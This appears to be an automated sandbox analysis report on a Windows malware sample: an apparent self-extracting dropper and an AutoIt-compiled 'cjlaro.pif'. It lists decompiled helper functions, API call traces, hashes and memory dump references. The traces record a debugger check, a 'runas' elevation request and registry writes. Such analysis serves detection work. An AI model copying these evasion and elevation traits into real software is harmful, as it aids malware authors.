          0x00208a19
          0x00208a20
          0x00208a2b
          0x00208a2b
          0x00208a22
          0x00208a24
          0x00208a24
          0x00208a2d
          0x00208a32
          0x00208abd
          0x00208a38
          0x00208a3a
          0x00208a45
          0x00208a4f
          0x00208a59
          0x00208a61
          0x00208a66
          0x00208a6a
          0x00208a8c
          0x00208a8e
          0x00208a91
          0x00208a95
          0x00208a9a
          0x00208a9d
          0x00208a9e
          0x00208a9f
          0x00208aa0
          0x00208aa3
          0x00208aa5
          0x00208aa6
          0x00208aa9
          0x00208ab0
          0x00208aab
          0x00208aab
          0x00208aab
          0x00208ab6
          0x00208ab6
          0x00208ab9
          0x00000000
          0x00208aba
          0x00208a6e
          0x00208a6e
          0x00208a78
          0x00208a7f
          0x00208a84
          0x00000000
          0x00000000
          0x00208a86
          0x00000000
          0x00208a86

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID: Shell.Explorer$about:blank
          • API String ID: 0-874089819
          • Opcode ID: 3b676418b013a7cfb5656264ecb45f899a55e8c0759c10ec339a3b3718933347
          • Instruction ID: fe6ff2a4b6962aa2b1338210fde6093e6005e0985cfad53f9c80c570a5368b41
          • Opcode Fuzzy Hash: 3b676418b013a7cfb5656264ecb45f899a55e8c0759c10ec339a3b3718933347
          • Instruction Fuzzy Hash: 68214C71720716BFD704DFA4C891A27B768BB45710B04811AB6568BAC3DFB0E871CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F12D7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
          Download Yara Rule
          C-Code - Quality: 75%
          			E001F12D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
				struct HWND__* _t20;
				struct HWND__* _t21;

				if(_a8 == 0x30) {
					E001FD6E4(0x230078, _a4);
				} else {
					_t27 = _a8 - 0x110;
					if(_a8 == 0x110) {
						E001FD70B(0x230078, _t27, _a4, _a20, _a28 & 1);
						if((_a28 & 0x00000001) != 0) {
							_t20 =  *0x22dfd4(_a4);
							if(_t20 != 0) {
								_t21 = GetDlgItem(_t20, 0x3021);
								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
									SetWindowTextW(_t21, 0x2222e4);
								}
							}
						}
					}
				}
				return 0;
			}





          0x001f12de
          0x001f1341
          0x001f12e0
          0x001f12e0
          0x001f12e7
          0x001f12fd
          0x001f1306
          0x001f130b
          0x001f1313
          0x001f131b
          0x001f1323
          0x001f1331
          0x001f1331
          0x001f1323
          0x001f1313
          0x001f1306
          0x001f12e7
          0x001f1349

          APIs
            • Part of subcall function 001FD70B: _swprintf.LIBCMT ref: 001FD731
            • Part of subcall function 001FD70B: _strlen.LIBCMT ref: 001FD752
            • Part of subcall function 001FD70B: SetDlgItemTextW.USER32(?,0022D154,?), ref: 001FD7B2
            • Part of subcall function 001FD70B: GetWindowRect.USER32(?,?), ref: 001FD7EC
            • Part of subcall function 001FD70B: GetClientRect.USER32(?,?), ref: 001FD7F8
          • GetDlgItem.USER32(00000000,00003021), ref: 001F131B
          • SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ItemRectTextWindow$Client_strlen_swprintf
          • String ID: 0
          • API String ID: 2622349952-4108050209
          • Opcode ID: 8611fc48f37c4e089fe24aa557932e5dde6ce0dfc803f989d9c7a24f6dd4d72a
          • Instruction ID: da24141e886f20bfad53a17caa88d331c0d571d0b7bed232da204b9c4187c895
          • Opcode Fuzzy Hash: 8611fc48f37c4e089fe24aa557932e5dde6ce0dfc803f989d9c7a24f6dd4d72a
          • Instruction Fuzzy Hash: A8F0C2B458025CF7DF291F60AC5DBF93B5ABF14364F008014FE49958A1C779C995EB24
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002004BA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
          Download Yara Rule
          C-Code - Quality: 79%
          			E002004BA(void* __ecx, void* __ebp, void* _a4) {
				void* __esi;
				long _t2;
				void* _t6;

				_t6 = __ecx;
				_t2 = WaitForSingleObject(_a4, 0xffffffff);
				if(_t2 == 0xffffffff) {
					_push(GetLastError());
					return E001F6CC9(E001F6CCE(_t6, 0x2300e0, L"\nWaitForMultipleObjects error %d, GetLastError %d", 0xffffffff), 0x2300e0, 0x2300e0, 2);
				}
				return _t2;
			}






          0x002004ba
          0x002004c0
          0x002004c9
          0x002004d2
          0x00000000
          0x002004f1
          0x002004f2

          APIs
          • WaitForSingleObject.KERNEL32(?,000000FF,002005D9,?,?,0020064E,?,?,?,?,?,00200638), ref: 002004C0
          • GetLastError.KERNEL32(?,?,0020064E,?,?,?,?,?,00200638), ref: 002004CC
            • Part of subcall function 001F6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F6CEC
          Strings
          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 002004D5
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
          • String ID: WaitForMultipleObjects error %d, GetLastError %d
          • API String ID: 1091760877-2248577382
          • Opcode ID: b7ae7b6b2973a52533a49a6103244f4a7c1d1ce9bb6da0cc9f9e2b13fad81cfa
          • Instruction ID: e33597b921d33aa7f5848d4718cea3e98bf5705fecd263b219cb3dbaf926dd56
          • Opcode Fuzzy Hash: b7ae7b6b2973a52533a49a6103244f4a7c1d1ce9bb6da0cc9f9e2b13fad81cfa
          • Instruction Fuzzy Hash: 85D02E31428832B7D61023647D0EEBE38058B22330F608308F275602EACB220EA682E6
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FD6C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E001FD6C1(void* __ecx) {
				struct HRSRC__* _t3;
				void* _t5;

				_t5 = __ecx;
				_t3 = FindResourceW(GetModuleHandleW(0), L"RTL", 5);
				if(_t3 != 0) {
					 *((char*)(_t5 + 0x64)) = 1;
					return _t3;
				}
				return _t3;
			}





          0x001fd6c4
          0x001fd6d4
          0x001fd6dc
          0x001fd6de
          0x00000000
          0x001fd6de
          0x001fd6e3

          APIs
          • GetModuleHandleW.KERNEL32(00000000,?,001FCFBE,?), ref: 001FD6C6
          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,001FCFBE,?), ref: 001FD6D4
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FindHandleModuleResource
          • String ID: RTL
          • API String ID: 3537982541-834975271
          • Opcode ID: 55d94236e2241af3c7f12e90eda6e63dcb2ea13e0409308904539c82cf287371
          • Instruction ID: 40d69448c77e36c534feca1d9774e0cf5f76786f70f4997a38a665ecb3a78328
          • Opcode Fuzzy Hash: 55d94236e2241af3c7f12e90eda6e63dcb2ea13e0409308904539c82cf287371
          • Instruction Fuzzy Hash: FAC01231241311B6D73017B07C0DF6329496B11B11F551448B245D91D0DAA6C449C651
          Uniqueness

          Uniqueness Score: -1.00%

          Analysis Process: cjlaro.pif PID: 5028 Parent PID: 6428 cjlaro.pifCOMMON

          Executed Functions

          Function 011398F0, Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
          Download Yara Rule
          APIs
          • _wcslen.LIBCMT ref: 01139911
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • _memmove.LIBCMT ref: 0113995C
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141546
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141560
            • Part of subcall function 011414F7: __CxxThrowException@8.LIBCMT ref: 01141571
          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 011399A3
          • _memmove.LIBCMT ref: 01139FE6
          • _memmove.LIBCMT ref: 0113A914
          • _memmove.LIBCMT ref: 01159769
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
          • String ID:
          • API String ID: 2383988440-0
          • Opcode ID: 3b06908abc9dd4d8b97ca6fdb746be993cc2cc4231fe931ca2507abdcc58751b
          • Instruction ID: 8b3c5ad186125f3198103d810390e21f27280a6571696ed7c35a14f10b707f8c
          • Opcode Fuzzy Hash: 3b06908abc9dd4d8b97ca6fdb746be993cc2cc4231fe931ca2507abdcc58751b
          • Instruction Fuzzy Hash: 3E13AF70608341DFD72CDF28D480A2ABBE5BF89308F14896DE996CB359D771E845CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011335F0, Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 01133681
          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 01133697
          • __wsplitpath.LIBCMT ref: 011336C2
            • Part of subcall function 0114392E: __wsplitpath_helper.LIBCMT ref: 01143970
          • _wcscpy.LIBCMT ref: 011336D7
          • _wcscat.LIBCMT ref: 011336EC
          • SetCurrentDirectoryW.KERNELBASE(?), ref: 011336FC
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141546
            • Part of subcall function 011414F7: std::exception::exception.LIBCMT ref: 01141560
            • Part of subcall function 011414F7: __CxxThrowException@8.LIBCMT ref: 01141571
            • Part of subcall function 01133D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0113378C,?,?,?,00000010), ref: 01133D38
            • Part of subcall function 01133D20: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 01133D71
          • _wcscpy.LIBCMT ref: 011337D0
          • _wcslen.LIBCMT ref: 01133853
          • _wcslen.LIBCMT ref: 011338AD
          Strings
          • _, xrefs: 0113394C
          • Error opening the file, xrefs: 011581AF
          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0115817E
          • Unterminated string, xrefs: 011582C6
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
          • API String ID: 3393021363-188983378
          • Opcode ID: 8f3c684266aac361d26072462edbb9ff4c519185cf68e2e1fb1e8cd841bf89ca
          • Instruction ID: d0602824b5205907b2ed4cd40d4cd302566f6027966b2f94763aefca11376ef6
          • Opcode Fuzzy Hash: 8f3c684266aac361d26072462edbb9ff4c519185cf68e2e1fb1e8cd841bf89ca
          • Instruction Fuzzy Hash: F6D1CFB1518342AAD719EF68C880AAFB7E8BFD5704F04492DE9D547200EB74D649CBA3
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113D7A0, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 138windowCOMMON
          Download Yara Rule
          APIs
          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0113D7BA
            • Part of subcall function 01132190: __wcsicoll.LIBCMT ref: 01132262
            • Part of subcall function 01132190: __wcsicoll.LIBCMT ref: 01132278
            • Part of subcall function 01132190: __wcsicoll.LIBCMT ref: 0113228E
            • Part of subcall function 01132190: __wcsicoll.LIBCMT ref: 011322A4
            • Part of subcall function 01132190: _wcscpy.LIBCMT ref: 011322C4
          • IsDebuggerPresent.KERNEL32 ref: 0113D7C6
          • GetFullPathNameW.KERNEL32(C:\Users\user\77066510\txoxpdjc.qnr,00000104,?,011D7F50,011D7F54), ref: 0113D82D
            • Part of subcall function 011316A0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 011316E5
          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0113D8A2
          • MessageBoxA.USER32 ref: 0115E14F
          • SetCurrentDirectoryW.KERNEL32(?), ref: 0115E1A3
          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0115E1D3
          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0115E21D
          • ShellExecuteW.SHELL32(00000000), ref: 0115E224
            • Part of subcall function 011403E0: GetSysColorBrush.USER32(0000000F), ref: 011403EB
            • Part of subcall function 011403E0: LoadCursorW.USER32(00000000,00007F00), ref: 011403FA
            • Part of subcall function 011403E0: LoadIconW.USER32 ref: 01140410
            • Part of subcall function 011403E0: LoadIconW.USER32 ref: 01140423
            • Part of subcall function 011403E0: LoadIconW.USER32 ref: 01140436
            • Part of subcall function 011403E0: LoadImageW.USER32 ref: 0114045E
            • Part of subcall function 011403E0: RegisterClassExW.USER32 ref: 011404AD
            • Part of subcall function 01140350: CreateWindowExW.USER32 ref: 01140385
            • Part of subcall function 01140350: CreateWindowExW.USER32 ref: 011403AE
            • Part of subcall function 01140350: ShowWindow.USER32(?,00000000), ref: 011403C4
            • Part of subcall function 01140350: ShowWindow.USER32(?,00000000), ref: 011403CE
            • Part of subcall function 0113E2C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0113E3A7
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: LoadWindow$Icon__wcsicoll$CurrentDirectoryName$CreateFullPathShow$BrushClassColorCursorDebuggerExecuteFileForegroundImageMessageModuleNotifyPresentRegisterShellShell__wcscpy
          • String ID: AutoIt$C:\Users\user\77066510\txoxpdjc.qnr$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
          • API String ID: 1688597619-2627081920
          • Opcode ID: 918f05b159d7baf3cae95fc93358b86d43a4667456565d552277153fa79bd41c
          • Instruction ID: 8637bf4523c7cf1ea08b13dd74f9f6a6262f69d607a1cf1025e0464b0238439f
          • Opcode Fuzzy Hash: 918f05b159d7baf3cae95fc93358b86d43a4667456565d552277153fa79bd41c
          • Instruction Fuzzy Hash: 06414D70A06204AFDB3CB7E4E884BED7B789B98718F4041D4E66553289CB7069C8C722
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113EE30, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
          Download Yara Rule
          APIs
          • LoadLibraryA.KERNELBASE(uxtheme.dll,0113EE15,0113D92E), ref: 0113EE3B
          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0113EE4D
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: IsThemeActive$uxtheme.dll
          • API String ID: 2574300362-3542929980
          • Opcode ID: b154503ca2d56e818258f367dbdcd4ac370cbef1535787cb7d862b768acdd4e9
          • Instruction ID: 27704746e80a9caa31c24c358165cbd0b5050a8c5226c72e90c7b089cff88a34
          • Opcode Fuzzy Hash: b154503ca2d56e818258f367dbdcd4ac370cbef1535787cb7d862b768acdd4e9
          • Instruction Fuzzy Hash: C8D0C9B4906727DAEB380F26C4897067BE4AB44A42F20883CE6A291559EB74D084CB34
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0116399B, Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
          Download Yara Rule
          APIs
          • GetFileAttributesW.KERNELBASE(?,00000000), ref: 011639AC
          • FindFirstFileW.KERNELBASE(?,?), ref: 011639BD
          • FindClose.KERNEL32(00000000), ref: 011639D0
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: FileFind$AttributesCloseFirst
          • String ID:
          • API String ID: 48322524-0
          • Opcode ID: 93815275a25e4e6cf56cc64e2af27138e99a8b92690c6be399ca99c148b04c49
          • Instruction ID: 85638d0608c5799a7c193459a473f52d5208c5090ad2ede9e3828551db57c3ee
          • Opcode Fuzzy Hash: 93815275a25e4e6cf56cc64e2af27138e99a8b92690c6be399ca99c148b04c49
          • Instruction Fuzzy Hash: 2DE092368145149B8624BA7CAC494E9779CDB06375F000752FE38C21C0E731A9E44BD6
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0114F170, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
          Download Yara Rule
          APIs
          • SetUnhandledExceptionFilter.KERNELBASE(Function_0001F12E), ref: 0114F175
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ExceptionFilterUnhandled
          • String ID:
          • API String ID: 3192549508-0
          • Opcode ID: 845a48fa2eb84a7f8f39c3cd2319cdd3f743b318e3ac610800352b9090319982
          • Instruction ID: 3809b8b72a6218cc9470a337aea3ba000ee173a94f31db62e4c67936f303e361
          • Opcode Fuzzy Hash: 845a48fa2eb84a7f8f39c3cd2319cdd3f743b318e3ac610800352b9090319982
          • Instruction Fuzzy Hash: 0F9002A865610257875C17B5998960526905B5DD0274204686111DC518DBA050499711
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01133C50, Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __wcsnicmp
          • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
          • API String ID: 1038674560-3360698832
          • Opcode ID: 630ad98cc92148618fe050d3e46d953096b7af9551306908edcc75fe40d2057b
          • Instruction ID: 82fcef9cd8bc3b9dfac3abe40c332f28649c73248f2caed37ac4fa7c01fefc44
          • Opcode Fuzzy Hash: 630ad98cc92148618fe050d3e46d953096b7af9551306908edcc75fe40d2057b
          • Instruction Fuzzy Hash: 3E612D71714312EBE75DAB26DC81FAF3358AF51708F408029FC259A346FB70EA4186A6
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01139430, Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Message$Peek$DispatchSleepTranslate
          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
          • API String ID: 1762048999-758534266
          • Opcode ID: b02b04351f92e3ab3371cdcbd7c1d40ccb5adbeff354097107b3a1b9ff5dc6f8
          • Instruction ID: 585839681cade68ddd8d41007071986b5d43df4d4c39dc561052196843f527e3
          • Opcode Fuzzy Hash: b02b04351f92e3ab3371cdcbd7c1d40ccb5adbeff354097107b3a1b9ff5dc6f8
          • Instruction Fuzzy Hash: 4062D571604346DFDB2CDF64C484BAABBE4BFD5308F04491EE56587289D7B0E889CB92
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119AB4D, Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
          Download Yara Rule
          APIs
          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0119AC5C
          • RegCreateKeyExW.KERNELBASE(?,?,00000000,011B4E64,00000000,?,00000000,?,?,?), ref: 0119ACB6
          • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0119AD00
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: CloseConnectCreateRegistry
          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
          • API String ID: 3217815495-966354055
          • Opcode ID: 8f22fc3ea2b71e59de0405430fa81a4c0c93f5827765bf07eeb582f3b3a5d839
          • Instruction ID: e58f4a94786f72dec59b11ee198fece4d9013c085873b9be83ba8cdefc3927c2
          • Opcode Fuzzy Hash: 8f22fc3ea2b71e59de0405430fa81a4c0c93f5827765bf07eeb582f3b3a5d839
          • Instruction Fuzzy Hash: 3FE17FB1614301ABDB18EF68D884F1AB7E8BF98704F14895CF959DB245DB34E804CBA2
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0118CD0B, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
          Download Yara Rule
          APIs
          • _wcsncpy.LIBCMT ref: 0118CE26
          • __wsplitpath.LIBCMT ref: 0118CE65
          • _wcscat.LIBCMT ref: 0118CE78
          • _wcscat.LIBCMT ref: 0118CE8B
          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CE9F
          • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000104,?), ref: 0118CEB2
            • Part of subcall function 0116397D: GetFileAttributesW.KERNELBASE(?), ref: 01163984
          • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CEF2
          • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CF0A
          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CF1B
          • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CF2C
          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CF40
          • _wcscpy.LIBCMT ref: 0118CF4E
          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0118CF91
          Strings
